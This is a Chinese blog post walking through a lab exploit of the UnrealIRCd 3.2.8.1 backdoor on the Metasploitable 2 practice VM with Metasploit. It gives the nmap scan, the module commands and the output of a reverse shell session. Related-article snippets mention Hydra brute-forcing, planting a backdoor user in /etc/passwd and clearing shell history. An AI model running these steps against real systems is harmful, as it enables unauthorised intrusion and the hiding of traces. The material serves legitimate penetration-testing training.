msf利用Metasploitable 2 漏洞之6667端口之unreal_ircd_3281_backdoor

最新推荐文章于 2024-05-23 09:55:30 发布
最新推荐文章于 2024-05-23 09:55:30 发布
阅读量5.9k 收藏 9
点赞数 4
分类专栏: 主机漏洞复现 文章标签: msf metaspolit2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/csdnmmd/article/details/80205073
版权
本文介绍如何使用Metasploit框架针对Metasploitable系统中的unreal_ircd_3281_backdoor漏洞进行渗透测试。通过启动虚拟机并确定目标IP后,利用Nmap扫描开放端口,并选择合适模块实施攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Metasploitable漏洞演练系统 是Metasploit团队维护的一个集成了各种漏洞弱点的Linux主机(ubuntu)镜像,这方便大家对于msf的学,以下以6667端口的unreal_ircd_3281_backdoor进行攻击。

可以在虚拟机中启动(登录密码和账号都是msfadmin)


查看其ip:    ifconfig


地址为:192.168.127.145

然后在kali linux中进行渗透:

启动msf


然后nmap 192.168.127.145查看开放端口

exec: nmap 192.168.127.145

Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-05 13:29 CST
Nmap scan report for 192.168.127.145
Host is up (0.00015s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
1099/tcp open  rmiregistry
1524/tcp open  ingreslock
2049/tcp open  nfs
2121/tcp open  ccproxy-ftp
3306/tcp open  mysql
5432/tcp open  postgresql
5900/tcp open  vnc
6000/tcp open  X11
6667/tcp open  irc
8009/tcp open  ajp13
8180/tcp open  unknown

MAC Address: 00:0C:29:E4:E7:DD (VMware)

因为作为靶机,所以端口自然就是很多,但是在实际中,不可能开放这么多的端口的。

然后我们要利用的是

6667端口之unreal_ircd_3281_backdoor

所以搜索: search unreal_ircd_3281_backdoor


然后使用:use exploit/unix/irc/unreal_ircd_3281_backdoor


再执行show options


设置攻击机:set RHOST 192.168.127.145


然后执行:exploit

Started reverse TCP double handler on 192.168.127.144:4444
[*] 192.168.127.145:6667 - Connected to 192.168.127.145:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 192.168.127.145:6667 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo uacFt7kPS2PL19yF;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "uacFt7kPS2PL19yF\r\n"
[*] Matching...
[*] A is input...

[*] Command shell session 1 opened (192.168.127.144:4444 -> 192.168.127.145:36349) at 2018-05-05 13:38:50 +0800

权限就已经拿到了:










metasploitable2 漏洞合集学习
qq_43233085的博客
02-05 4770
metasploitable2 漏洞合集学习弱密码 Weak PasswordSamba MS-RPC Shell命令注入漏洞Vsftpd 源码包后门漏洞UnreallRCd 后门漏洞Java RMI SERVER 命令执行漏洞Root用户弱口令漏洞(SSH爆破)Distcc 后门漏洞PHP CGI 参数注入执行漏洞Druby 远程代码执行漏洞Ingreslock 后门漏洞Rlogin 后门漏洞 ...
手把手教你kali渗透Metasploitable
热门推荐
qq_41620273的博客
12-24 1万+
记一次kali渗透Metasploitbale靶机 1.网络设置 2.ifconfig查看Metasploitable的IP: 3.对Metasploitbale进行nmap端口扫描: Nmap 192.168.22.128 端口爆破:FTP、SSH等 工具:Hydra 备用字典:user.txt: pass,txt: 一、 爆破FTP hydra -L /root/桌面/user.txt -P /root/桌面/pass.txt [ftp://192.168.22.128](ftp://19
Lazysysadmin靶机环境搭建与渗透测试
qq_43647462的博客
11-23 914
LazySysAdmin 攻击环境 两台服务器均放在了VM中进行环境搭建,均采用了NET连接的方式,但是由于个人环境问题,所以导致了靶机无法正常连接至NET网络,手工配置IP,在开机界面按下e,将ro改成rw signie init=/bin/bash,ctrl+x进入命令行 在已知kali攻击机的ip为x.x.x.100的情况下,手工配置ip ifconfig eth0 x.x.x.101 netmask 255.255.255.0 broadcast x.x.x.255 route add defaul
网络通信端口选择一定要慎重 -- 可恶的 6667 端口
nimo10050的博客
03-17 5341
开篇 本文通过一个真实案例,讲明端口选取的重要性!!! 没事别 TM 随意选端口~~~,嫌麻烦可以直接看文末总结! 项目背景 如下图所示,有三个 web 应用互相通过 http 协议进行通信。 项目基于 python 的 flask web 框架开发,http 接口请求用的第三方的 requests 模块。 测试环境如下: Server 1 【172.16.10.128】 app1 - ...
ircd_3281_backdoor 6667端口渗透----linux安全
lzj20060418的博客
05-08 610
使用命令show options来查看需要哪些参数配置,可以看到需要rhosts(靶机ip), set rhosts 192.168.100.2(靶机ip),exploit/run进行渗透,但是没有渗透成功,看到报错信息,Exploit completed,but no session was created.这是因为没有攻击载荷。那么直接利用,即可。可以看到第一遍渗透的时候,可以发现失败了,根据报错信息,从中可以判断出需要配置lhost本地ip(攻击机ip),挂完攻击机ip后渗透成功。
Metasploitable2 - tcp port 6667 - ircd
Nixawk
08-01 1049
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor msf exploit(unreal_ircd_3281_backdoor) > show options Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):    Name   Current Settin
Metasploitable2靶机之第八篇--UnreallRCd后门漏洞
千寻的博客
04-03 1485
文章目录环境漏洞利用摘抄 环境 漏洞利用 摘抄 “I am going to live every minute of it” 我将珍惜活着的每一分钟。 – 《心灵奇旅》
推荐开源项目:UnrealIRCd — 强大的开放源代码IRC服务器
gitblog_00100的博客
05-23 408
推荐开源项目:UnrealIRCd — 强大的开放源代码IRC服务器 unrealircdOfficial UnrealIRCd repository. Downloads are available from our site项目地址:https://gitcode.com/gh_mirrors/un/unrealircd 项目介绍 UnrealIRCd,一款自1999年起便为数千个网络提供服...
Metasploit溢出UnrealIRCd后门漏洞
weixin_34185320的博客
12-16 1125
Metasploit溢出UnrealIRCd后门漏洞利用UnrealIRCd后门漏洞,获取目标主机的root权限。某些站点的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程***者能够执行任意代码。一、利用nmap工具扫描目标主机1.1使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择“在终端中打开”。1.2在终端中...
linux 漏洞靶机,【漏洞验证】Metasploitable2靶机漏洞复现
weixin_39796878的博客
05-16 1186
文章目录Metasploitable2靶机漏洞复现1、TWiki 'rev' Parameter Arbitrary Command Execution2、VNC Server 'password' Password3、Ingreslock 后门漏洞4、UnrealIRCd Backdoor(ircd)5、 PHP-CGI Query String Parameter Injection Arbi...
信息安全保障实验
07-02
天津大学信息安全与保障实验
kali渗透综合靶机之Lazysysadmin
玄道的网安博客
06-16 673
0x01靶机环境下载 Lazysysadmin靶机百度云下载 链接:https://pan.baidu.com/s/1pTg38wf3oWQlKNUaT-s7qQ 提取码:q6zo 0x02Lazysysadmin靶机搭建 直接在VMware打开即可 文件->打开->Lazysysadmin.ovf 0x03 渗透测试 主机发现 netdiscover -i eth0 -r 192.168.20.0/24 或 netdiscover -i eth0 -r 192.168...
python调用msf_使用python操纵metasploit简单小记
weixin_39900468的博客
11-30 2044
最近想做一款自动化的主机漏洞扫描工具。打算以python作为基础语言,metasploit作为开发基础库。查资料发现国内的论坛博客都只会互相抄来抄去,没一个能打的。那就我来写一篇。本文用到的python库是allfro/pymetasploit使用pip进行安装pip install pymetasploit我的开发环境是windows,metasploit跑在kali环境下。所以在kali下面要...
实验五:使用unreal_ircd服务漏洞创建后门并清除痕迹
weixin_45822468的博客
01-15 562
cat /etc/passwd 这个目录下记录了所有登录用户的详细信息在这个地方留下一个后门。在攻击机上用telnet远端登录使用新建的用户登录(只建立用户名可以登 创了密码不行)echo '用户名:登录口令:0:0:注释:主目录:登陆的shell。history-c 清除历史所有命令。
Unrealircd走入困境
weixin_34403693的博客
11-18 161
以下摘自unrealircd官方站点: Syzopgoinginactive Becausemywristconditionhasbecomeworse,I'mnowgoingininactivestate.I'munsureifI'llever(beableto)getback,andifso,i...
win32unrealircd的编译
OldHawk的专栏
11-15 1436
  尽管官方提供有编译好的win32版下载,但我们在对源码进行修改后,是需要重新编译的,下面将详细介绍在win32下如何编译unrealircd。  因为我的操作系统是winxp+sp2+vs2005,所以以下的步聚均是基于此系统环境。  1,从unrealircd官方站下载最新版的源码包,解压。  2,配置好编译环境:    a,将vs2005里vc8的nmake.exe文件路径加入系统pa
kali linux对Metasploitable2漏洞利用,irc后门利用 笔记
边城浪子的博客
09-20 1376
IRC是Internet Relay Chat 的英文缩写,中文一般称为互联网中继聊天。它是由芬兰人Jarkko Oikarinen于1988年首创的一种网络聊天协议。经过十年的发展,目前世界上有超过60个国家提供了IRC的服务。IRC的工作原理非常简单,您只要在自己的PC上运行客户端软件,然后通过因特网以IRC协议连接到一台IRC服务器上即可。它的特点是速度非常之快,聊天时几乎没有延迟的现象,并...
常见的端口漏洞利用弱点
ovowovo的博客
12-12 707
21 ftp 主要看是否支持匿名,也可以跑弱口令 80 web 常见web漏洞以及是否为一些管理后台 443 openssl 心脏滴血以及一些web漏洞测试 873 rsync 主要看是否支持匿名,也可以跑弱口令 1900 bes默认管理后台 2082/2083 cpanel主机管理系统登陆 (国外用较多)? 2222 DA虚拟主机管理系统登陆 (国外用较多) 2601,2604 zebra路由,...
第五章:Metaspolit技术
RMC131的博客
04-03 751
Metasploit是当前信息安全于渗透测试领域最流行的术语,它完全颠覆了 已有的渗透测试方式。几乎所有操作系统都支持Metasploit,而且Metasplooit框架在这些系统上的工作流程基本都一样。Metasploit框架(Metaaploit Framework,MSF)使一个开源工具,旨在方便渗透测试,它是由Ruby语言编写的模板化框架,具有很好的扩展性,便于测试人员开发、使用定制的工具模板。Metasploit可向后端模块提供多种用来控制测试的接口(如控制台、Web、CLI)。
kali msf
最新发布
03-08
msf6 > use exploit/unix/irc/unreal_ircd_3281_backdoor # 选择漏洞模块[^3] msf6 exploit(unreal_ircd_3281_backdoor) > set RHOSTS 192.168.1.100 # 设置目标IP msf6 exploit(unreal_ircd_3281_backdoor) > ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值